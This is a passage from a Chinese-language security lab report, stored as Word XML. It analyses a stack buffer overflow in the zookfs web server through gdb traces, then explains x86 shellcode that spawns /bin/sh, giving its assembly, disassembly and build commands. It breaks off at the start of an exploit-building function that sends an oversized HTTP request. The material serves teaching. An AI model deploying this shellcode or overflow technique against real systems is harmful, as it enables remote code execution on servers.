&lt;buf.4435+604&gt;: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0x8050864 &lt;buf.4435+804&gt;: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0x805092c &lt;buf.4435+1004&gt;:      'A' &lt;repeats 25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0x8050946 &lt;buf.4435+1030&gt;:      "HTTP/1.0"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0x805094f &lt;buf.4435+1039&gt;: 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0x8050950 &lt;buf.4435+1040&gt;: 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x/10 reqpath</w:t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  [打印reqpath，为"/", A * 1024]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0xbfffee08:     "/", 'A' &lt;repeats 199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0xbfffeed0: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0xbfffef98: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0xbffff060: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0xbffff128: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0xbffff1f0:     'A' &lt;repeats 25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0xbffff20a:     "\005\b|\365\377\277"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0xbffff211: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0xbffff212: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0xbffff213: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[继续用n命令执行]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85          if (sendfd(svcfds[i], env, env_len, fd) &lt;= 0)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[此时zookd将请求发送给zookfs]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sizeof reqpath</w:t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[reqpath不会溢出]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$3 = 2048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sizeof env</w:t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    [env不会溢出]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$4 = 8192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quit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`zookd`此时并不存在缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0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4.2接下来分析`zookfs`。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在`zookfs.c`中，`http_serve()`函数以`REQUEST_URI`环境变量为参数。在`http_serve`处设置断点，分析栈结构。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gdb -p $(pgrep zookfs-exstack)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b http_serve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Breakpoint 1 at 0x804951c: file http.c, line 275.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[运行漏洞触发程序]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Continuing.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[New process 5076]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[Switching to process 5076]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Breakpoint 1, http_serve (fd=3, name=0x80510b4 "/", 'A' &lt;repeats 199 times&gt;...) at http.c:275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warning: Source file is more recent than executable.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275         void (*handler)(int, const char *) = http_serve_none;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$ebp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$1 = (void *) 0xbfffde08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(gdb)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&amp;handler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$2 = (void (**)(int, const char *)) 0xbfffddfc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&amp;pn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$3 = (char (*)[1024]) 0xbfffd9fc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&amp;st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$4 = (struct stat *) 0xbfffd9a4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&amp;fd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$5 = (int *) 0xbfffde10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&amp;name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$6 = (const char **) 0xbfffde14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$ebp+4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0xbfffde0c:     0x08048d86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根据上面的调试信息绘制`http_serve()`的栈结构：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114300" distR="114300">
            <wp:extent cx="3904615" cy="3980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继续执行到`strcat()`，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279         getcwd(pn, sizeof(pn));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(gdb)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280         setenv("DOCUMENT_ROOT", pn, 1);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282         strcat(pn, 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(gdb)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pn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$7 = "/home/httpd/lab\000", 'A' &lt;repeats 504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(gdb)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strlen(name)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$8 = 1025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sizeof pn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$9 = 1024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此处将执行`strcat()`，在`pn`中已经包含的来自`getcwd()`的字符串后面加上长度1025的`name`，将超过`pn`所分配的大小1024，导致缓冲区溢出。接着执行一步，并查看缓冲区溢出情况。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283         split_path(pn);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x/10s pn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0xbfffd9fc:     "/home/httpd/lab/", 'A' &lt;repeats 184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0xbfffdac4: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0xbfffdb8c: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0xbfffdc54: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0xbfffdd1c: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0xbfffdde4:     'A' &lt;repeats 40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0xbfffde0d:     "\215\004\b\003"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0xbfffde12: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0xbfffde13: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0xbfffde14:     "\264\020\005\b"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&amp;handler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0xbfffddfc:     'A' &lt;repeats 16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$ebp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0xbfffde08:     "AAAA"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$ebp+4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0xbfffde0c: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在`pn`之前的缓冲区，包括`handler`和`$ebp`，已经被字符`A`覆盖，但返回地址并没有被完全改写。该如何改写?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285         if (!stat(pn, &amp;st))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(gdb)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296         handler(fd, pn);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Program received signal SIGSEGV, Segmentation fault.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0x41414141 in ?? ()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(gdb) bt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 0  0x41414141 in ?? ()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 1  0x080495e8 in http_serve (fd=3, name=0x80510b4 "/", 'A' &lt;repeats 199 times&gt;...) at http.c:296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 2  0x08048d00 in main (argc=&lt;error reading variable: Cannot access memory at address 0x41414149&gt;,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argv=&lt;error reading variable: Cannot access memory at address 0x4141414d&gt;) at zookfs.c:39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:rsidR="00E62DC0" w:rsidRDefault="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>继续执行到`handler(fd, pn);`，由于`handler`变量被改写为`0x41414141`，导致程序崩溃。这发生在先前发现的`strcpy()`漏洞之前。这个示例并没有利用改写返回地址来劫持控制流。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0"/>
    <w:p w:rsidR="00683357" w:rsidRDefault="00683357"/>
    <w:p w:rsidR="00683357" w:rsidRPr="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5C35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5C35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5C35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5C35">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5C35">
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（本部分</w:t>
      </w:r>
      <w:r>
        <w:t>为附加实验部分，可以不做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>学习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原理，并利用漏洞在服务器上运行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，以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>return-to-libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRPr="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>原理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参考资料：</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>Smashing The Stack For Fun And Profit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hyperlink r:id="rId14" w:anchor="article" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>[online]</w:t>
        </w:r>
      </w:hyperlink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利用缓冲区溢出漏洞改写函数返回地址来劫持程序控制流，令其指向预执行代码。通常该代码会启动一个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，称作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>"shellcode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>。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下面是一个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语言程序启动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的例子。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#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include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&lt;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stdio.h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&gt;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main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>() {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*name[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2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name[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 xml:space="preserve">] =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/bin/sh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name[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 xml:space="preserve">] =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NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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/* int execve(const char *filename, char *const argv[],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      char *const envp[]);   */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execve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(name[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 xml:space="preserve">], name,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NULL</w:t>
      </w:r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exit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lastRenderedPageBreak/>
        <w:t>execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>在父进程中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>一个子进程，在子进程中调用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exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>函数启动新的程序。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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>系列函数中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execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>为内核级系统调用。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execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>执行第一个参数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filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>字符串所指文件，第二个参数是利用数组指针来传递命令行参数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第一个元素是命令本身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，并且要以空指针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null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>结束，最后一个参数则为传递给执行文件的新环境变量数组。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的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execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>通过寄存器传递参数，由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>0x80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>软中断触发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syscall()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用，过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35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内存中存在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null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>结尾字符串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"/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p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内存中存在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"/bin/sh"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的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>后加一个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null long word</w:t>
      </w:r>
    </w:p>
    <w:p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execve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用编号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>(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0xb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eax</w:t>
      </w:r>
    </w:p>
    <w:p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"/bin/sh"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的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>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name[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）到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ebx</w:t>
      </w:r>
    </w:p>
    <w:p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"/bin/sh"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的地址的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>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name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）到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ecx</w:t>
      </w:r>
    </w:p>
    <w:p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null long word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的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（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envp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）到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edx</w:t>
      </w:r>
    </w:p>
    <w:p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int $0x80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用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syscall()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若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execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用失败，程序将继续执行，很可能导致崩溃。为在调用失败后仍然可以正常退出，在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execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>之后添加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exit(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>(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0x1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exa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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0x0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>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exb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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int $0x80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用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syscall()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中，多处需要用到地址，一个问题是事先并不知道代码和字符串会被放置在哪里。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解决该问题的一种方法是用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jmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>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指令，通过指令指针相对寻址来跳到特定位置，而不需要事先知道准确地址。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首先，在通过改写返回地址来跳转到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后，利用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jmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指令跳转到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指令。将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指令放在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"/bin/sh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>字符串之前，当执行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指令时，字符串地址将被入栈，作为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被执行时的返回地址。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指令只需简单的跳转到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jmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>之后的代码，执行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指令将栈中的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的返回地址，即字符串地址，拷贝到一个寄存器使用。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下面是程序描述与跳转示意图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C3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返回地址跳转到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（跳转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）</w:t>
      </w:r>
    </w:p>
    <w:p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jmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>跳转到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（跳转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）</w:t>
      </w:r>
    </w:p>
    <w:p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获得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"/bin/sh"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地址</w:t>
      </w:r>
    </w:p>
    <w:p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execv()</w:t>
      </w:r>
    </w:p>
    <w:p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exit()</w:t>
      </w:r>
    </w:p>
    <w:p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跳转到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（跳转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）</w:t>
      </w:r>
    </w:p>
    <w:p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字符串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"/bin/sh"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 address         &lt;———— stack growth ————              high address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+—————————(3)—————————+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V                     |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[jmp][pop][execve()][exit()][call]["/bin/sh"][argv][envp][sfp][ret]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^  |                          ^                                 |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|  +—————————(2)——————————————+                                 |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+——————————————————————————————————(1)——————————————————————————+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通常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将被作为字符串注入缓冲区中。由于空字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>(null)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>会被认为是字符串结尾，因此需要将其中的空字节去掉。一种主要手段是用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xorl %eax,%eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指令来令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eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>寄存器为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，用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eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>作为参数，从而避免在参数中直接使用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。另外，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越小越好。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在实验中提供了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个文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35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shellcode.S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汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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shellcode.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：编译后二进制代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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run-shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：直接运行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shellcode.bin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查看完整的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代码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shellcode.S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：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# include &lt;sys/syscall.h&gt;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系统调用编号表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# define STRING  "/bin/sh"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执行命令字符串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# define STRLEN  7       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字符串长度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define ARGV    (STRLEN+1)              /* execve()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相对于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的偏移量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define ENVP    (ARGV+4)                /* execve()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相对于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的偏移量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                /* argv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末尾元素和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envp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复用同一地址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.globl main             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令符号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对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ld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和其他程序可见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.type   main, @function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设置符号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的类型为函数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main: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jmp     calladdr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跳转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(2)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call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popladdr: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popl    %esi    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地址出栈写入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esi, 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32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movl    %esi,(ARGV)(%esi)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地址写入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argv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string+8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xorl    %eax,%eax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获得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32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movb    %al,(STRLEN)(%esi)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结尾字节置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0, %al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寄存器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16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(%ax)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中低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b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表示字节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movl    %eax,(ENVP)(%esi)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envp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string+12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）置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                /* argv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末尾元素和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envp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复用同一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movb    $SYS_execve,%al         /* syscall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1: syscall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编号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movl    %esi,%ebx               /* syscall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2: string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leal    ARGV(%esi),%ecx         /* syscall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3: argv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leal    ENVP(%esi),%edx         /* syscall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4: envp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int     $0x80   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调用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syscall, $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表示数字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xorl    %ebx,%ebx               /* syscall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2: 0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movl    %ebx,%eax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置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inc     %eax                    /* syscall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1: SYS_exit (1)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mov+inc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来避免空字节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int     $0x80   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调用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calladdr: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call    popladdr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将下一指令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(string)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push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入栈后跳转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.ascii  STRING              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将字符串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不追加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存入连续地址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下列命令用于编译，提取，反编译，执行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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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编译：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gcc -m32 -c -o shellcode.bin shellcode.S</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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提取二进制指令：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objcopy -S -O binary -j .text shellcode.bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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反编译：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objdump -D -b binary -mi386 shellcode.bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D5C35" w:rsidRDefault="006D5C35" w:rsidP="006D5C35">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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执行：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./run-shellcode shellcode.bin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下面是反编译的结果：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objdump -D -b binary -mi386 shellcode.bin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shellcode.bin:     file format binary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Disassembly of section .data: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00000000 &lt;.data&gt;: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0:   eb 1f                   jmp    0x21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2:   5e                      pop    %esi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3:   89 76 08                mov    %esi,0x8(%esi)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6:   31 c0                   xor    %eax,%eax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8:   88 46 07                mov    %al,0x7(%esi)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b:   89 46 0c                mov    %eax,0xc(%esi)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e:   b0 0b                   mov    $0xb,%al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10:   89 f3                   mov    %esi,%ebx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12:   8d 4e 08                lea    0x8(%esi),%ecx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15:   8d 56 0c                lea    0xc(%esi),%edx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18:   cd 80                   int    $0x80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1a:   31 db                   xor    %ebx,%ebx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1c:   89 d8                   mov    %ebx,%eax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1e:   40                      inc    %eax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1f:   cd 80                   int    $0x80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21:   e8 dc ff ff ff          call   0x2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26:   2f                      das                       # /bin/sh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27:   62 69 6e                bound  %ebp,0x6e(%ecx)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2a:   2f                      das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2b:   73 68                   jae    0x95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运行上述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可以启动一个新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：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$ ./run-shellcode shellcode.bin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</w:p>
    <w:p w:rsidR="006D5C35" w:rsidRPr="00976DE2" w:rsidRDefault="00B668DD" w:rsidP="00976DE2">
      <w:pPr>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#24292e" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="006D5C35" w:rsidRPr="00976DE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>代码注入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利用之前的漏洞将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注入到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服务器并启动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。回顾之前的漏洞触发过程：</w:t>
      </w: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(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>构造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过长的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客户端请求，并发送请求到服务器。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def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build_exploit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24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):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req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GET 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*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1024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HTTP/1.0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Fonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> req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(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
